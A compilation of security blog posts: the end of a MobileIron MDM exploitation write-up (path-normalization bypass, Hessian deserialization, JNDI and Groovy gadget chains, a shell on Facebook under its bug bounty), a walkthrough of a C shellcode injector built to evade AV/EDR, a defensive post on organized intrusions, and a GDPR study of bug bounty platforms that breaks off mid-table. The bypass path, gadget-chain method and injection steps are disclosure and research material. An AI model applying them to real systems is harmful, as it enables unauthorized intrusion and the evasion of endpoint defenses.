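    return any(re.match(rule, path) for rule in block_rules)

# Toy model of Tomcat's path handling: drop ";..." path parameters per
# segment, then resolve "." and ".." segments.
def tomcat_normalize(path: str) -> str:
    segments = [seg.split(";", 1)[0] for seg in path.split("/")]
    out = []
    for seg in segments:
        if seg == "..":
            out.pop()
        elif seg not in ("", "."):
            out.append(seg)
    return "/" + "/".join(out)

direct = "/mifs/services/someService"
bypass = "/mifs/.;/services/someService"

assert apache_blocks(direct)                    # the plain path is rejected up front
assert not apache_blocks(bypass)                # the bypass matches neither rule
assert tomcat_normalize(bypass) == direct       # yet Tomcat routes it to the service
```

The same disagreement is what the `/mifs/.;/services/someService` request above exploits: the front layer sees a path it has no rule for, and the back layer sees the forbidden one.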

How We Exploited It

Now back to exploiting the Hessian deserialization! Moritz Bechler has already published a very thorough study in his Java Unmarshaller Security paper! From his open-source marshalsec code we also learn that, during deserialization, Hessian can not only trigger entry points such as equals() and hashCode() through a HashMap, but can also chain into toString() through XString. Four exploitation chains for Hessian deserialization were publicly known:

  • Apache XBean
  • Caucho Resin
  • Spring AOP
  • ROME EqualsBean/ToStringBean

Given our target environment, the only chain we could trigger was Spring AOP!

  Usable Name            Effect
  ✗      Apache XBean    JNDI injection
  ✗      Caucho Resin    JNDI injection
  ✓      Spring AOP      JNDI injection
  ✗      ROME EqualsBean RCE

In any case, now that we have JNDI injection, we just apply A Journey From JNDI/LDAP to Remote Code Execution Dream Land, presented by Alvaro Muñoz and Oleksandr Mirosh at Black Hat USA 2016, and we get remote code execution… right?


Since Alvaro Muñoz and Oleksandr Mirosh presented this new attack vector at Black Hat, it has helped countless hackers large and small, to the point where some think "when you see deserialization, just throw JNDI at it!" But in October 2018, Java finally fixed the last piece of the JNDI injection puzzle; the fix is recorded as CVE-2018-3149. Since then, on any Java newer than 8u191, 7u201, or 6u211, code execution through JNDI/LDAP no longer works, so to pull off the attack against an up-to-date MobileIron we had to face this problem!

CVE-2018-3149 changes the default of com.sun.jndi.ldap.object.trustURLCodebase to false, preventing attackers from downloading remote bytecode to achieve code execution.
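For lab reproduction, the pre-CVE-2018-3149 behavior can be restored by explicitly re-enabling that JVM property on a throwaway test JVM (illustrative command line; `app.jar` is a placeholder for whatever vulnerable test application you are running):

```shell
# Re-enable remote codebase loading from LDAP references
# (disabled by default since the October 2018 CPU / CVE-2018-3149).
# Only sensible in a disposable lab environment.
java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar app.jar
```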

Fortunately, a JNDI Naming Reference can still point at a class factory already present on the local machine! Borrowing an idea similar in spirit to Return-Oriented Programming, we can hunt for exploitable classes on the local classpath for further abuse. For the detailed technique, see Exploiting JNDI Injections in Java, published by Michael Stepankin in early 2019, which describes how to load ELProcessor through Tomcat's BeanFactory to achieve arbitrary code execution!

The road looked clear, but in practice it fell just short: ELProcessor was only introduced in Tomcat 8, so the bypass above only works on Tomcat 8 and later, while our target ran Tomcat 7.x. We therefore had to find a new gadget for BeanFactory! After some searching, we found this remark in an article by Welkin:

Besides javax.el.ELProcessor, there are of course many other classes that satisfy the conditions and can be injected into BeanFactory as the beanClass. For example, if the target machine's classpath contains the Groovy library, it can be combined with the Jenkins vulnerability that Orange published earlier.


The target's classpath happened to contain Groovy! So we made Meta-Programming great again :D

In reality, however, the Groovy on the target server was version 1.5.6, a release from a decade ago so old that it does not support meta-programming, so in the end we went back to the Groovy code base and found a new gadget chain based on GroovyShell! For the details of the chain, see the pull request I sent to JNDI-Injection-Bypass!

Attacking Facebook

We now had a perfect remote code execution chain built on JNDI + BeanFactory + GroovyShell, so let's go attack Facebook! As mentioned earlier, we had known since 2016 that Facebook uses MobileIron as its MDM solution. Checking again, the front page now simply returns 403 Forbidden, but fortunately the Web Service layer is not blocked!

Everything was ready! But a few days before attacking Facebook, we suddenly remembered something from our previous visit to Facebook's servers: for security reasons, Facebook seems to block all unauthorized outbound connections. That is of critical importance to a JNDI injection attack! The very core of JNDI injection is that the victim connects to an attacker-controlled malicious server and then acts on the malicious Naming Reference it returns, leading to the rest of the exploitation; if even that initial connection to the attacker's server is impossible, there is no follow-up to speak of.


At that point, every road through JNDI injection was sealed off, and we had to go back to the Hessian deserialization and think again! Since none of the existing gadget chains could achieve remote code execution, we had to abandon JNDI injection and find a new chain!



To find a new gadget chain, we first had to understand deeply how and why the existing chains work. While rereading the Java Unmarshaller Security paper, one sentence caught my attention:

Cannot restore Groovy’s MethodClosure as readResolve() is called which throws an exception.


Hmm, why did the author bother to add that sentence? A guess began to form:

The author must have evaluated the feasibility of Groovy as a gadget chain; it was blocked, but he must have seen some potential, or it would not have made it into the paper!


Starting from that guess: the Groovy chain is restricted by readResolve(), but the Groovy on our target happens to be very old, so perhaps the restriction had not yet been added to the library!

We compared the readResolve() implementation in groovy/runtime/MethodClosure.java between Groovy 1.5.6 and the latest version:

$ diff 1_5_6/MethodClosure.java 3_0_4/MethodClosure.java

>     private Object readResolve() {
>         if (ALLOW_RESOLVE) {
>             return this;
>         }
>         throw new UnsupportedOperationException();
>     }

Indeed, the old version has no ALLOW_RESOLVE restriction! A bit of archaeology shows that Groovy added this restriction itself as a mitigation for the Java deserialization vulnerabilities that surfaced in 2015, and it was even assigned CVE-2015-3253! Because Groovy here is only a supporting component used internally and never exposed, developers have no particular reason to update it, and so it became a link in our attack chain! This proves once again that "any seemingly insignificant component can become the reason you get hacked"!
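Hessian and MethodClosure are Java-specific, but the underlying hazard, a serialization hook that runs attacker-influenced logic during decoding, is easy to see in miniature in Python's pickle, where `__reduce__` plays the role the Java gadget chain has to build up to. This is a deliberately unsafe analogy in a different language, not MobileIron's code:

```python
import pickle

class Gadget:
    # __reduce__ tells pickle how to rebuild the object: "call this callable
    # with these args". A decoder that honors the hook runs the callable for
    # us, just as Hessian's object reconstruction ends up invoking gadget
    # methods like readResolve()/toString().
    def __reduce__(self):
        return (eval, ("7 * 191",))  # stand-in for attacker logic

blob = pickle.dumps(Gadget())   # what crosses the trust boundary
result = pickle.loads(blob)     # "deserialization" executes the payload
assert result == 1337
```

This is exactly why mitigations like Groovy's ALLOW_RESOLVE guard target the hook itself: the decoder, not the data, is what does the dangerous work.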

Finally, of course, we got a shell on a Facebook server. Here is the video:

Reporting and Remediation

We finished the research around March, wrote up the results on April 3, and reported them to MobileIron via [email protected]! The vendor started working on a fix upon receipt, released patches on June 15, and assigned three CVEs. For remediation details, please refer to the official MobileIron website!

  • CVE-2020-15505 - Remote Code Execution
  • CVE-2020-15506 - Authentication Bypass
  • CVE-2020-15507 - Arbitrary File Reading

Once the official patches were out, we also began monitoring the patch status of every MobileIron-using enterprise in the world. The check only looks at the Last-Modified header of static files, so the results are for reference only and do not fully reflect reality (Unknown means ports 443/8443 were not open, so the check could not be applied):


Meanwhile, we also kept monitoring Facebook. After confirming it remained unpatched for 15 days, we got into a Facebook server on July 2 and then reported it to the Facebook Bug Bounty Program!

Epilogue

At this point, we have demonstrated end to end how to find vulnerabilities in an MDM server: from bypassing Java language-level protections and network restrictions, to writing an exploit and using it successfully in a bug bounty program! For length reasons, many stories did not make it into this article; here are a few leads for anyone who wants to keep digging:

  • How to pivot from the MDM server to the employee mobile devices it manages
  • How to analyze MobileIron's proprietary MI Protocol
  • CVE-2020-15506 is, at its core, a very interesting authentication bypass

We hope this article draws attention to the MDM attack surface and the importance of enterprise security! Thanks for reading :D

SeasideBishop: A C port of the UrbanBishop shellcode injector

3 September 2020 at 15:20

SeasideBishop: A C port of b33f’s UrbanBishop shellcode injector

Introduction

This post covers a recent C port I wrote of b33f's neat C# shellcode loader UrbanBishop. The prolific Rastamouse also did a variation of UrbanBishop using D/Invoke, called RuralBishop. This injection method has some quirks I hadn't seen before, so I thought it would be interesting to port it to C.

Credit of course goes to b33f and Rastamouse, and special thanks to AsaurusRex and Adamant for their help in getting it working.

The code for this post is available here.

The Code

First, a quick outline of the injection method, and then I will break it down API by API. SeasideBishop creates a section and maps a view of it locally, opens a handle to a remote process, maps a view of that same section into the remote process, and copies shellcode into the local view. Since a view of the same section is also mapped in the remote process, the shellcode has now been allocated across processes. Next, a remote thread is created and an APC is queued on it. The thread is alerted and the shellcode runs.

Opening The Remote Process

[screenshot: get-pid]

Above we see the use of the native API NtOpenProcess to acquire a handle to the remote process. Native API calls are used throughout SeasideBishop, as they tend to be a bit stealthier than Win32 APIs, though they are still vulnerable to userland hooking.

Sections

A neat feature of this technique is the way that the shellcode is allocated in the remote process. Instead of using a more common and suspicious API like WriteProcessMemory, which is well known to AV/EDR products, SeasideBishop takes advantage of memory mapped files. This is a way of copying some or all of a file into memory and operating on it there, rather than manipulating it directly on disk. Another way of using it, which we will do here, is as an inter-process communication (IPC) mechanism. The memory mapped file does not actually need to be an ordinary file on disk. It can be simply a region of memory backed by the system page file. This way two processes can map the same region in their own address space, and any changes are immediately accessible to the other.

The way a region of memory is mapped is by calling the native API NtCreateSection. As the name indicates, a section, or section object, is the term for the memory mapped region.

[screenshot: create-section]

Above is the call to NtCreateSection within the local process. We create a section with a size of 0x1000, or 4096 bytes. This is enough to hold our demo shellcode, but might need to be increased to accommodate a larger payload. Note that the allocation will be rounded up to the nearest page size, which is normally 4k.

The next step is to create a view of the section. The section object is not directly manipulated, as it represents the file-backed region of memory. We create a view of the section and make changes to that view. The remote process can also map a view using the same section handle, thereby accessing the same section. This is what allows IPC to happen.
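The section-and-views idea is not Windows-specific. As a rough cross-platform analogy (Python's `multiprocessing.shared_memory`, not the Windows native APIs used here), two handles to one page-file-backed region see each other's writes, which is the property the injector relies on:

```python
from multiprocessing import shared_memory

# Conceptual analogue of NtCreateSection + two NtMapViewOfSection calls:
# one named, page-file-backed region mapped twice. Writes through one
# mapping are immediately visible through the other.
sect = shared_memory.SharedMemory(create=True, size=4096)  # "create section" + local view
view = shared_memory.SharedMemory(name=sect.name)          # second view of the same section

payload = b"\x90\x90\xcc"             # stand-in bytes, not real shellcode
sect.buf[: len(payload)] = payload    # the memcpy into the local view

assert bytes(view.buf[: len(payload)]) == payload  # visible via the second view

view.close()
sect.close()
sect.unlink()
```

In SeasideBishop, the second "view" lives in another process's address space, which is what turns this IPC trick into a write primitive.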

[screenshot: local-map-section]

Here we see the call to NtMapViewOfSection to create the view in the local process. Notice the use of RW and not RWX permissions, as we simply need to write the shellcode to the view.

[screenshot: memcpy]

Next a simple memcpy writes our shellcode to the view.

[screenshot: remote-map-section]

Finally we map a view of the same section in the remote process. Note that this time we use RX permissions so that the shellcode is executable. Now we have our shellcode present in the remote process’s memory, without using APIs like WriteProcessMemory. Now let’s work on executing it.

Starting From The End

In order to execute our shellcode in the remote process, we need a thread. In order to create one, we need to give the thread a function or address to begin executing from. Though we are not using Win32 APIs, the documentation for CreateRemoteThreadEx still applies. We need a “pointer to [an] application-defined function of type LPTHREAD_START_ROUTINE to be executed by the thread and [serve as] the starting address of the thread in the remote process. The function must exist in the remote process.” The function we will use is RtlExitUserThread. This is not a very well documented function, but debugging indicates that this function is part of the thread termination process. So if we tell our thread to begin executing at this function, we are guaranteed that the thread will exit gracefully. That’s always a good thing when injecting into remote processes.

So now that we know the thread will exit, how do we get it to execute our code? We’ll get there soon, but first we need to get the address of RtlExitUserThread so that we can use it as the start address of our new remote thread.

[screenshot: function-address]

There’s a lot going on here, but it’s really pretty simple. RtlExitUserThread is exported by ntdll.dll, so we need the DLL base address first before we can access its exports. We create the Unicode string needed by the LdrGetDllHandle native API call and then call it to get the address of ntdll.dll. With that done, we need to create the ANSI string required by LdrGetProcedureAddress to get the address of the RtlExitUserThread function. Again, notice no suspicious calls to LoadLibrary or GetProcAddress here.

Creating The Thread

Now that we have our thread start address, we can create it in the remote process.

[screenshot: create-remote-thread]

Here we have the call to NtCreateThreadEx that creates the thread in the target process. Note the use of the pRemoteFunction variable, which contains the start address of RtlExitUserThread. Note also that the true argument above is a Boolean value for the CreateSuspended parameter, which means that the thread will be created in a suspended state and will not immediately begin executing. This will give us time to tell it about the shellcode we’d like it to run.

Execution

We’re in the home stretch now. The shellcode is in the remote process and we have a thread ready to execute it. We just need to connect the two together. To do that, we will queue an Asynchronous Procedure Call (APC) on the remote thread. APCs are a way of asynchronously letting a thread know that we have work for it to do. Each thread maintains an APC queue. When the thread is next scheduled, it will check that queue and run any APCs that are waiting for it, and then continue with its normal work. In our case, that work will be to run the RtlExitUserThread function and therefore exit gracefully.

[screenshot: queue-apc]

Here we see how the thread and our shellcode meet. We use NtQueueApcThread to queue an APC onto the remote thread, using lpRemoteSection to point to the view containing the shellcode we mapped into the remote process earlier. Once the thread is alerted, it will check its APC queue and see our APC waiting for it.

[screenshot: alert-thread]

A quick call to NtAlertResumeThread and the thread is alerted and runs our shellcode, which of course pops the obligatory calc.

[screenshot: calc]

Conclusion

I thought this was a neat injection method, with some quirks I hadn’t seen before, and I enjoyed porting it over to C and learning the concepts behind it in more detail. Hopefully others will find this useful as well.

Thanks again to b33f, Rasta, Adamant, and AsaurusRex for their help!

The Enemy Is Not Ransomware, but Organized Hackers

20 August 2020 at 16:00

Foreword

Hacker attacks have always been part of the real world; they are just rarely disclosed in full. This year, several major domestic critical infrastructure providers (in the scope of Critical Information Infrastructure Protection, CIIP) and domestic multinational enterprises suffered serious security incidents. We would like to talk briefly about the core issues behind these incidents that enterprises truly need to consider and take seriously.

Enterprises Face Organized Hackers, Not Just Ransomware

Perhaps because ransomware is more eye-catching, the media prefers to present the major threats enterprises have faced in recent years under ransomware headlines. In reality, ransomware is merely a tool in the attack process, and encryption is only one means of extortion; attacks can even include the theft of sensitive data. Since we did not take part in the investigations or related activities for these incidents, we will use only publicly disclosed information to look at what concrete measures enterprises can take against this kind of threat.

According to the presentation by the Ministry of Justice Investigation Bureau at the iThome 2020 security conference:

In this attack, the hackers first compromised the company's systems through avenues such as web servers and employee computers, lurking and probing for a long time. They then stole account privileges, reached the AD server, tampered with Group Policy Objects (GPO) in the early morning hours, and planted the lc.tmp malware on internal servers. When employees came to work and turned on their computers, the machines immediately applied the tampered GPO and, following its instructions, automatically loaded the ransomware into memory and executed it.

After being encrypted by ransomware, an enterprise's first instinct is usually to ask why the antivirus software or endpoint protection did not work. The reality is that, against a targeted attack (Advanced Persistent Threat, APT), the attacker will inevitably study ways to bypass the enterprise's defenses and monitoring. What the enterprise should think about is a line of defense, a more comprehensive protection strategy, rather than reliance on any single security appliance or service.

From the description above, we can identify several problems:

  1. The web server had an exploitable vulnerability, and that vulnerability could let an attacker take control of the host for subsequent lateral movement. Possible causes include:
    • The system never underwent rigorous penetration testing or regular vulnerability scanning
    • It is a legacy system that cannot be patched (built on outdated frameworks or languages) or is no longer maintained by the vendor
    • It was a one-off campaign or test site that was not taken offline according to procedure afterwards, becoming a breach in the enterprise's defenses
    • It fell outside the enterprise's inventoried scope of protection (e.g., no WAF deployed in front)
  2. It was possible to hop step by step from employee computers or the web server to the AD server. Possible problems include:
    • Loose network segmentation, for example segmentation not based on the criticality of data or systems
    • Poorly controlled communication between servers on the same segment, with critical servers' ports unrestricted and no source IP allow-listing
    • Systems with exploitable, privilege-yielding weaknesses
  3. The GPO was tampered with in the early morning hours: the final issue is an untimely response mechanism (including staff mishandling the alerts they received). For critical systems with centralized management privileges, such as AD servers and asset-management software, the enterprise should, beyond strong controls on privileged accounts (such as OTP), also raise alerts on behaviors like "anomalous account logins", "anomalous accounts added to groups", "normal accounts logging in at anomalous times", and "newly created scheduled tasks or GPOs"; and each type of alert should have response and handling SLAs defined according to asset criticality.

You Need a More Comprehensive, Goal-Oriented View of Your Security Posture

In our red-team engagements over the past three years, we have taken the information assets most critical to an enterprise's operations as the exercise objective and emulated the attack patterns of organized hackers: external reconnaissance, gaining a foothold on external systems, lateral movement, progressively taking over more internal servers and escalating privileges, cracking passwords, and finally reaching the enterprise-designated critical assets to carry out the exercise scenario. Through this high-intensity, precise exercise, the enterprise not only gains a clear picture of the paths by which it can be compromised, but also gets to examine the shortcomings listed above and keep improving.

We believe that as long as your enterprise matters enough (matters to hackers, that is, not merely in its own estimation), organized attacks will not stop! Continually finding your own weak spots and raising your defensive strength is the only approach that genuinely reduces risk.

As for "third-party supply chain security" and "how to formulate a more complete security strategy", we will cover those separately another time.

Bug Bounty Platforms vs. GDPR: A Case Study

22 July 2020 at 00:00

What Do Bug Bounty Platforms Store About Their Hackers?

I do care a lot about data protection and privacy things. I’ve also been in the situation, where a bug bounty platform was able to track me down due to an incident, which was the initial trigger to ask myself:

How did they do it? And do I know what these platforms store about me and how they protect this (my) data? Not really. So why not create a little case study to find out what data they process?

One utility that comes in quite handy when trying to get this kind of information (at least for Europeans) is the General Data Protection Regulation (GDPR). The law’s main intention is to give people an extensive right to access and restrict their personal data. Although GDPR is a law of the European Union, it is extra-territorial in scope. So as soon as a company collects data about a European citizen/resident, the company is automatically required to comply with GDPR. This is the case for all bug bounty platforms that I am currently registered on. They probably cover 98% of the world-wide market: HackerOne, Bugcrowd, Synack, Intigriti, and Zerocopter.

Spoiler: All of them have to be GDPR-compliant, but not all seem to have proper processes in place to address GDPR requests.

Creating an Even Playing Field

To create an even playing field, I’ve sent out the same GDPR request to all bug bounty platforms. Since the scenario should be as realistic and real-world as possible, no platform was explicitly informed beforehand that the request, respectively, their answer, is part of a study.

  • All platforms were given the same questions, which should cover most of their GDPR response processes (see Art. 15 GDPR).
  • All platforms were given the same email aliases to include in their responses.
  • All platforms were asked to hand over a full copy of my personal data.
  • All platforms were given a deadline of one month to respond to the request. Given the increasing COVID situation back in April, all platforms were offered an extension of the deadline (as per Art. 12 par. 3 GDPR).

Analyzing the Results

First of all, to compare responses that differ widely in style, completeness, accuracy, and thoroughness, I decided to count only information that is part of the official answer. Discussions after the official response are not considered here, because accepting those might create advantages for some competitors over others. This should give a clear picture of how thoroughly each platform reads and answers a GDPR request.

Instead of going with a kudos (points) system, I’ve decided to use a “traffic light” rating:

Indicator Expectation
(green) All good, everything provided, expectations met.
(orange) Improvable, at least one (obvious) piece of information is missing, only implicitly answered.
(red) Left out, missing a substantial amount of data or a significant data point and/or unmet expectations.

This light system is then applied to the different GDPR questions and derived points either from the questions themselves or from the data provided.

Results Overview

To give you a quick overview of how the different platforms performed, here’s a summary showing the lights indicators. For a detailed explanation of the indicators, have a look at the detailed response evaluations below.

Question HackerOne Bugcrowd Synack Intigriti Zerocopter
Did the platform meet the deadline?
(Art. 12 par. 3 GDPR)
Did the platform explicitly validate my identity for all provided email addresses?
(Art. 12 par. 6 GDPR)
Did the platform hand over the results for free?
(Art. 12 par. 5 GDPR)
Did the platform provide a full copy of my data?
(Art. 15 par. 3 GDPR)
Is the provided data accurate?
(Art. 5 par. 1 (d) GDPR)
Specific question: Which personal data about me is stored and/or processed by you?
(Art. 15 par. 1 (b) GDPR)
Specific question: What is the purpose of processing this data?
(Art. 15 par. 1 (a) GDPR)
Specific question: Who has received or will receive my personal data (including recipients in third countries and international organizations)?
(Art. 15 par. 1 (c) GDPR)
Specific question: If the personal data wasn’t supplied directly by me, where does it originate from?
(Art. 15 par. 1 (g) GDPR)
Specific question: If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR?
(Art. 15 par. 2 GDPR and Art. 46 GDPR)

Detailed Answers

HackerOne

Request sent out: 01st April 2020
Response received: 30th April 2020
Response style: Email with attachment
Sample of their response:

Question Official Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? Via email. I had to send a random, unique code from each of the mentioned email addresses.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? No. A copy of the VPN access logs/packet dumps was/were not provided.

However, since this is not a general feature, I do not consider this to be a significant data point, but still a missing one.
Is the provided data accurate? Yes. -
Which personal data about me is stored and/or processed by you? First- & last name, email address, IP addresses, phone number, social identities (Twitter, Facebook, LinkedIn), address, shirt size, bio, website, payment information, VPN access & packet log HackerOne provided a quite extensive list of IP addresses (both IPv4 and IPv6) that I have used, but based on the provided dataset it is not possible to say when they started recording/how long those are retained.

HackerOne explicitly mentioned that they are actively logging VPN packets for specific programs. However, they currently do not have any ability to search in it for personal data (it’s also not used for anything according to HackerOne)
What is the purpose of processing this data? Operate our Services, fulfill our contractual obligations in our service contracts with customers, to review and enforce compliance with our terms, guidelines, and policies, To analyze the use of the Services in order to understand how we can improve our content and service offerings and products, For administrative and other business purposes, Matching finders to customer programs -
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Zendesk, PayPal, Slack, Intercom, Coinbase, CurrencyCloud, Sterling While analyzing the provided dataset, I noticed that the list was missing a specific third-party called “TripActions”, which is used to book everything around live hacking events. This is a missing data point, but it’s also only a non-general one, so the indicator is only orange.

HackerOne added the data point as a result of this study.
If the personal data wasn’t supplied directly by me, where does it originate from? HackerOne does not enrich data. -
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? This question wasn’t answered as part of the official response. I’ve notified HackerOne about the missing information afterwards, and they’ve provided the following:

Vendors must undergo due diligence as required by GDPR, and where applicable, model clauses are in place.

Remarks

HackerOne provided an automated and tool-friendly report. While the primary information was summarized in an email, I received quite a huge JSON file that was easily parsable with your preferred scripting language. However, a non-technical person receiving the data this way would probably have trouble getting useful information out of it.
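As an illustration of how such an export can be made readable, here is a short Python sketch. The field names (`profile`, `ip_addresses`) and the sample values are hypothetical, since the real schema of the export is not documented here:

```python
import json

# Hypothetical excerpt of a GDPR JSON export; the real structure and key
# names will differ per platform.
raw = """
{
  "profile": {"name": "Jane Hacker", "shirt_size": "M"},
  "ip_addresses": ["203.0.113.7", "2001:db8::1", "203.0.113.7"]
}
"""

data = json.loads(raw)
unique_ips = sorted(set(data["ip_addresses"]))
print(f"{data['profile']['name']}: {len(unique_ips)} distinct IPs logged")

assert unique_ips == ["2001:db8::1", "203.0.113.7"]
```

A dozen lines like these turn a raw dump into a per-category summary, which is roughly what a non-technical recipient would need the platform to provide directly.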

Bugcrowd

Request sent out: 1st April 2020
Response received: 17th April 2020
Response style: Email with a screenshot of an Excel table
Sample of their response:

Question Official Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? No identity validation was performed. I’ve sent the request to their official support channel, but there was no explicit validation to verify it’s really me, for neither of my provided email addresses.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? No. Bugcrowd provided a screenshot of what looks like an Excel file with a couple of information on it. In fact, the screenshot you can see above is not even a sample but their complete response.
However, the provided data is not complete since it misses a lot of data points that can be found on the researcher portal, such as a history of authenticated devices (IP addresses see your sessions on your Bugcrowd profile), my ISC2 membership number, everything around the identity verification.

There might be more data points, such as logs collected through the proxies or VPN endpoints that some programs require, but no information was provided about that.

Bugcrowd neither provided anything about the other given email addresses, nor did they deny having anything related to them.
Is the provided data accurate? No. The provided data isn’t accurate. Address information, as well as email addresses and payment information are super old (it does not reflect my current Bugcrowd settings), which indicates that Bugcrowd stores more than they’ve provided.
Which personal data about me is stored and/or processed by you? First & last name, address, shirt size, country code, LinkedIn profile, GooglePlus address, previous email address, PayPal email address, website, current IP sign-in, bank information, and the Payoneer ID This was only implicitly answered through the provided copy of my data.

As mentioned before, it seems like there is a significant amount of information missing.
What is the purpose of processing this data? - This question wasn’t answered.
Who has received or will receive my personal data (including recipients in third countries and international organizations)? - This question wasn’t answered.
If the personal data wasn’t supplied directly by me, where does it originate from? - This question wasn’t answered.
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? - This question wasn’t answered.

Remarks

The “copy of my data” was essentially the screenshot of the Excel file shown above. I was astonished by the compactness of the answer and asked again for answers to all the provided questions as per GDPR. What followed was quite a long discussion with the responsible personnel at Bugcrowd. I mentioned more than once that the provided data was inaccurate and incomplete and that they had left out most of the questions, which I have a right by law to get an answer to. Still, they insisted that all answers were GDPR-compliant and complete.

I’ve also offered them an extension of the deadline in case they needed more time to evaluate all questions. However, Bugcrowd did not want to take the extension. The discussion ended with the following answer on 17th April:

We’ve done more to respond to you that any other single GDPR request we’ve ever received since the law was passed. We’ve done so during a global pandemic when I think everyone would agree that the world has far more important issues that it is facing. I need to now turn back to those things.

I’ve given up at that point.

Synack

Request sent out: 25th March 2020
Response received: 3rd July 2020
Response style: Email with a collection of PDFs, DOCXs, XLSXs
Sample of their response:

Question Answer Comments Indicator
Did the platform meet the deadline? Yes, with an extension of 2 months. Synack explicitly requested the extension.
Did the platform explicitly validate my identity for all provided email addresses? No. I’ve sent the initial request via their official support channel, but no further identity verification was done.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? Very likely not. Synack uses a VPN solution called “LaunchPoint”, respectively “LaunchPoint+” which requires every participant to go through when testing targets. What they do know - at least - is when I am connected to the VPN, which target I am connected to, and how long I am connected to it. However, neither a connection log nor a full dump was provided as part of the data copy.

The same applies to the system called “TUPOC”, which was not mentioned.

Synack did neither provide anything about all other given email addresses nor did they deny to have anything related to them.

Since I do consider these to be significant data points in the context of Synack that weren’t provided, the indicator is red
Is the provided data accurate? Yes. The data that was provided is accurate, though.
Which personal data about me is stored and/or processed by you? Identity information: full name, location, nationality, date of birth, age, photograph, passport or other unique ID number, LinkedIn Profile, Twitter handle, website or blog, relevant certifications, passport details (including number, expiry data, issuing country), Twitter handle and Github handle

Taxation information: W-BEN tax form information, including personal tax number

Account information: Synack Platform username and password, log information, record of agreement to the Synack Platform agreements (ie terms of use, code of conduct, insider trading policy and privacy policy) and vulnerability submission data;

Contact details: physical address, phone number, and email address

Financial information: bank account details (name of bank, BIC/SWIFT, account type, IBAN number), PayPal account details and payment history for vulnerability submissions

Data with respect to your engagement on the Synack Red Team: Helpdesk communications with Synack, survey response information, data relating to the vulnerabilities you submitted through the Synack Platform and data related to your work on the Synack Platform
Compared to the provided data dump, a few pieces of information are missing: last visited date, last clicks on link tracking in emails, browser type and version, operating system, and gender are not mentioned but are still processed.

“Log information” in the context of “Account information”, and “data related to your work on the Synack Platform” in the context of “Data with respect to your engagement on the Synack Red Team”, are too vague, since they could mean anything.

There is no mention of either LaunchPoint, LaunchPoint+ or TUPOC details.

Since I do consider these to be significant data points in the context of Synack, the indicator is red.
What is the purpose of processing this data? Recruitment, including screening of educational and professional background data prior to and during the course of the interviewing process and engagement, including carrying out background checks (where permitted under applicable law).

Compliance with all relevant legal, regulatory and administrative obligations

The administration of payments, special awards and benefits, the management, and the reimbursement of expenses.

Management of researchers

Maintaining and ensuring the communication between Synack and the researchers.

Monitoring researcher compliance with Synack policies

Maintaining the security of Synack’s network customer information
A really positive aspect of this answer is that Synack included the retention times of each data point.
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Cloud storage providers (Amazon Web Services and Google), identification verification providers, payment processors (including PayPal), customer service software providers, communication platforms and messaging platform to allow us to process your customer support tickets and messages, customers, background search firms, applicant tracking system firm. Synack referred to their right to mostly only name “categories of third-parties” except for AWS and Google. While this shows some transparency issues, it is still legal to do so.
If the personal data wasn’t supplied directly by me, where does it originate from? Synack does not enrich data. -
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? Synack engages third-parties in connection with the operation of Synack’s crowdsourced penetration testing business. To the extent your personal data is stored by these third- party providers, they store your personal data in either the European Economic Area or the United States. The only thing Synack states here is that data is stored in the EEA or the US, but the storage itself is not a safeguard. Therefore the indicator is red.

Remarks

The communication process with Synack was rather slow because it seems like it takes them some time to get information from different vendors.

Update 23rd July 2020:
One document was lost in the conversations with Synack, which turns a couple of their points from red to green. The document was digitally signed, and due to the added proofs, I can confirm that it has been signed within the deadline set for their GDPR request. The document itself tries to answer the specific questions, but there are some inconsistencies compared to the also attached copy of the privacy policy (in terms of data points being named in one but not the other document), which made it quite hard to create a unique list of data points. However, I’ve still updated the table for Synack accordingly.

Intigriti

Request sent out: 07th April 2020
Response received: 04th May 2020
Response style: Email with PDF and JSON attachments.
Sample of their response:

Question Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? Yes. Via email. I had to send a random, unique code from each of the mentioned email addresses.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? Yes. I couldn’t find any missing data points.
Is the provided data accurate? Yes. -
Which personal data about me is stored and/or processed by you? First & last name, address, phone number, email address, website address, Twitter handle, LinkedIn page, shirt size, passport data, email conversation history, accepted program invites, payment information (banking and PayPal), payout history, IP address history of successful logins, history of accepted program terms and conditions, followed programs, reputation tracking, the time when a submission has been viewed.

Data categories processed: User profile information, Identification history information, Personal preference information, Communication preference information, Public preference information, Payment methods, Payout information, Platform reputation information, Program application information, Program credential information, Program invite information, Program reputation information, Program TAC acceptance information, Submission information, Support requests, Commercial requests, Program preference information, Mail group subscription information, CVR Download information, Demo request information, Testimonial information, Contact request information.
I couldn’t find any missing data points.

A long, long time ago, Intigriti had a VPN solution enabled for some of their customers, but I haven’t seen it active anymore since then, so I do not consider this data point anymore.
What is the purpose of processing this data? Purpose: Public profile display, Customer relationship management, Identification & authorization, Payout transaction processing, Bookkeeping, Identity checking, Preference management, Researcher support & community management, Submission creation & management, Submission triaging, Submission handling by company, Program credential handling, Program inviting, Program application handling, Status reporting, Reactive notification mail sending, Pro-active notification mail sending, Platform logging & performance analysis. -
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Intercom, Mailerlite, Google Cloud Services, Amazon Web Services, Atlas, Onfido, Several payment providers (TransferWise, PayPal, Pioneer), business accounting software (Yuki), Intigriti staff, Intigriti customers, encrypted backup storage (unnamed), Amazon SES. I’ve noticed a little contradiction in their report: while saying data is transferred to these parties (which includes third-country companies such as Google and Amazon), they also included a “Data Transfer” section saying “We do not transfer any personal information to a third country.”

After asking for clarification, Intigriti told me that they’re only hosting in the Europe region in regard to AWS and Google.
If the personal data wasn’t supplied directly by me, where does it originate from? Intigriti does not enrich data. -
